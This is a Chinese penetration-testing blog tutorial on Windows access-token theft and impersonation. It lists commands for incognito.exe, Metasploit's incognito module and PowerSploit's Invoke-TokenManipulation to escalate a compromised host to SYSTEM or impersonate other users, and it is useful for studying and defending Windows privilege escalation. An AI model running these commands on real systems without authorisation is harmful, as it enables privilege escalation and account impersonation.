内网渗透之AccessToken窃取与利用

最新推荐文章于 2024-08-13 10:08:39 发布
最新推荐文章于 2024-08-13 10:08:39 发布
阅读量3.8k 收藏 8
点赞数 2
原文链接:https://blog.csdn.net/qq_36119192/article/details/103965659
版权

文章目录

令牌(Token)

令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。

令牌有很多种:

  • 访问令牌(Access Token):表示访问控制操作主体的系统对象
  • 会话令牌(Session Token):是交互会话中唯一的身份标识符
  • 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾

Windows的AccessToken有两种类型:

  • Delegation Token:授权令牌,它支持交互式会话登录 (例如本地用户直接登录、远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话 (例如使用net use访问共享文件夹)。

注: 两种token只在系统重启后清除 具有Delegation token的用户在注销后,该Token将变成Impersonation token,依旧有效。

AccessToken的窃取与利用

AccessToken的窃取与利用需要administrator管理员权限。也就是说要提权。

窃取AccessToken的方法:

incognito.exe程序 、InvokeTokenManipulat.ps1脚本 、MSF里的incognito模块

1:程序 incognito.exe

程序地址:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

AccessToken的列举(需要administrator权限)

incognito.exe list_tokens -u

img

操作:模拟其他用户的令牌(复制token)

如果要使用AccessToken模拟其他用户,可以使用命令

incognito.exe execute -c "完整的Token名" cmd.exe

例如:模拟system权限用户(提权至system):
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
降权至当前用户:
incognito.exe execute -c "当前用户token" cmd.exe

img

2:MSF下的incognito模块

需要administrator权限

use incognito #加载incognito
list_tokens -u #列出AccessToken
getuid    #查看当前token
impersonate_token "NT AUTHORITY\SYSTEM" #模拟system用户,getsystem命令即实现了该命令。如果要模拟其他用户,将token名改为其他用户即可
steal_token 1252 #从进程窃取token
getsystem #提升至system权限
rev2self #返回到之前的AccessToken权限

img

3:Invoke-TokenManipulation.ps1脚本

这个脚本是PowerSploit下Exfiltration文件夹内的一个脚本

下载地址:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

使用命令如下:

列举token:
Invoke-TokenManipulation -Enumerate
提权至system:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authoritysystem"
复制(窃取)进程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500
复制(窃取)线程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500

img

img

MSF实战假冒令牌提权

假设我们现在已经获得了目标主机的权限,但是通过 getsystem 和其他方式提权失败。

img

此时,我们可以尝试使用假冒令牌进行提权。

use incognito           #进入incognito模块
list_tokens -u          #列出令牌

如图,可以看到有两种类型的令牌。

  • Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话。

令牌的数据取决于当前获取权限的高低。

img

当前列出了3个令牌。我们就可以通过下面的命令假冒 Administrator 用户了。

impersonate_token WIN2008\\adminstrator     #假冒WIN2008\adminstrator  的令牌
impersonate_token WIN2008\\test             #假冒WIN2008\test          的令牌
impersonate_token "NT AUTHORITY\SYSTEM"     #假冒System的令牌
 
从进程窃取令牌
steal_token 1252
返回之前的token
rev2self

img

原文:https://blog.csdn.net/qq_36119192/article/details/103965659

zhang三
关注
内网渗透之访问令牌AccessToken窃取利用
谢公子的博客
03-29 3247
目录 AccessToken AccessToken窃取利用 1:程序 incognito.exe 2:MSF下的incognito模块 3:Invoke-TokenManipulation.ps1脚本 AccessToken 令牌有很多种: 访问令牌(Access Token):表示访问控制操作主体的系统对象 会话令牌(Session Token):是交互会话中...
窃取AccessToken的方法:incognito.exe程序
07-28
它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动...窃取AccessToken的方法: incognito.exe程序 、InvokeTokenManipulat.ps1脚本 、MSF里的incognito模块
AccessToken窃取利用
qq_63527808的博客
01-20 607
注: 两种 token 只在系统重启后清除具有 Delegation token 的用户在注销后,该 Token 将变成Impersonation token,依旧有效。(1)Delegation Token:授权令牌,它支持交互式会话登录(例如本地用户直接登录、远程桌面登录访问)(2)Impresonation Token:模拟令牌,它是非交互的会话(例如使用net use。上述此处进行模拟:1、先登录域用户,注销后登录管理员账户。二、在 Windows 下使用工具。三、在 MSF 中使用。
微信公众平台开发2-access_token获取及应用(含源码)
weixin_30641999的博客
03-02 274
微信公众平台开发-access_token获取及应用(含源码)作者:孟祥磊-《微信公众平台开发实例教程》   很多系统中都有access_token参数,对于微信公众平台的access_token参数,微信服务器判断该公众平台所拥有的权限,允许或者禁止公众平台进行当前的操作。 一、access_token作用及使用场景 (一)access_token的作用   access_token由...
漏洞复现-XXL-JOB accessToken 存在身份认证绕过漏洞
最新发布
玄道的网安博客
08-13 676
官方已修复该漏洞,建议用户修改调度中心和执行器配置项 xxl.job.accessToken 的默认值。默认情况下是非空的,也就是xxl.job.accessToken=default_token。动态生效:用户在线通过Web IDE开发的任务代码,远程推送至执行器,实时加载执行。XXL-JOB为了灵活支持多语言以及脚本任务,提供了创新的 “是许雪里(XXL-JOB)社区的一款基于java语言的分布式任务调度平台。:任务以源码方式维护在调度中心,支持通过Web IDE在线开发、维护。
内网渗透-windows令牌窃取
weixin_44912035的博客
02-10 334
令牌(token) 访问令牌(Access Token):表示访问控制操作主体的系统对象 会话令牌(Session Token):是交互会话中唯一的身份标识符。 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾 msf伪造令牌 use incognito #进入incognito模块 list_tokens -u #列出令牌 Delegation Token:也就是授权令牌,它支持交互式登录(例如可以通过远程
Access Token 访问令牌 的获取与使用
热门推荐
IT小郭的技术博客
04-24 2万+
三方库导入时,通常需要输入账号和令牌进行鉴权。账号为指定平台的 HTTP 克隆账号,访问令牌即 Access Token,本文介绍如何获取常见三方代码平台的Access Token
内网渗透----Token 窃取利用
浅笑996的博客
12-03 2322
0x00 前言 在之前的文章《渗透技巧——程序的降权启动》介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的。这一次将要对 token 窃取利用做进一步介绍,测试常用工具,分享利用技巧。 0x01 简介 本文将要介绍以下内容 ; · Token 简介 · Metasploit 中的 incognito · Windows 平台下的 incognito · ...
微信公众平台开发之获得ACCESSTOKEN .Net代码解析
10-22
主要为大家详细解析了微信公众平台开发之获得ACCESSTOKEN .Net代码,感兴趣的小伙伴们可以参考一下
萤石accesstoken渗透
07-28
对于萤石的AccessToken渗透问题,根据提供的引用内容,可以看出AccessToken是通过调用萤石开放平台的接口获取的,并且每隔7天需要重新获取一次。在项目发布后,为了自动获取AccessToken,可以通过代码编写一个...
iOS开发之路--微博OAuth授权_取得用户授权的accessToken
09-04
这些信息是后续与微博API交互的基础,通常我们会将其存储起来以便后续使用。 总结来说,iOS应用通过微博OAuth授权的过程主要包括以下几步: 1. 创建并加载OAuth认证URL。 2. 监听`UIWebView`的加载事件,获取授权...
内网渗透Token令牌窃取
qq_44029310的博客
08-05 2529
本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌的窃取利用
模拟登录获取新浪微博的access_token
acuna1的专栏
06-30 7841
public static AccessToken refreshToken(){                  Properties props = new Properties();                  try {                          props.load(Thread.currentThread().getContextClassL
拦截器实现AccessToken
qq_35945923的博客
08-29 574
1.互联网开放平台设计: 1.需求:现在A公司与B公司进行合作,B公司需要调用A公司开放的外网接口获取数据, 如何保证外网开放接口的安全性。 2.开放平台提供者:需要提供为每个合作机构提供对应的appId,appSecret (需要appId+appSecret生成对应的accessToken) 3.基于令牌方式实现 appId (第三方合作机构,区分不同的机构) 永远不能改变 appSecret...
access token
qq_42607773的博客
08-27 474
ccess token是Windows操作系统安全性的一个概念。一个访问令牌包含了此登陆会话的安全信息。当用户登陆时,系统创建一个访问令牌,然后以该用户身份运行的的所有进程都拥有该令牌的一个拷贝。 该令牌唯一表示该用户、用户的组和用户的特权。系统使用令牌控制用户可以访问哪些安全对象,并控制用户执行相关系统操作的能力。有两种令牌:主令牌和模拟的令牌。主令牌是与进程相关的;模拟的令牌是与模拟令牌的线...
Web开发茶话会_accessToken和refreshToken
wuxeek的博客
02-10 459
《Web开发茶话会》系列文章的专注于Web开发过程中的重点难点,采取:应用示例+分析+小试牛刀的模式,让读者先有个感性认知,再分析解释知识点,最后抛出一个两个问题,加深理解。此系列文既谈技术,也谈“风月”,请读者备好茶水。
逻辑漏洞-找回密码修改返回包
weixin_44110913的博客
10-29 839
有时候在密码找回的时候,我们修改返回包为正确的返回包即可成功修改别人的密码 将原本错误的返回包改为正确的返回包在点击foword看是不是修改返回包也可以修改密码
找回机制-修改返回状态值+找回密码重定向
xiaoheizi的博客
07-05 112
右键选择Do intercept----response to this request模块(接收当前数据包的返回包),记住正确返回包的返回状态值:{"code":200,"data":"18313278106","msg":""}查看数据库表,发现新注册的用户repswcode值依然是y,xhz用户和两个账号的区别就是进行过找回密码。福利期货再次点击忘记密码,随意输入错误验证码,抓取忘记密码的数据包。
返回请求被修改后绕过
一杯咖啡的渗透记忆
10-14 4399
目录 1、返回请求参数修改 2、返回请求整体被替换 3、修复方案 正常情况下,我们通过抓包修改前端的请求,返回我们测试想要的结果。但有时候,如果后端处理不充分,或者是逻辑处理有问题: 1、返回请求参数修改 具体修改的参数: Result 返回结果:从false改成True。 ErrorCode如果你其他正常请求返回包有代码的可以替换,如果不清楚直接设置为空值 ErrorMsg 如果你其他正常请求返回包有代码的可以替换,如果不清楚直接设置为空值 上面修改完成,直接发送请求, 如果跳..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值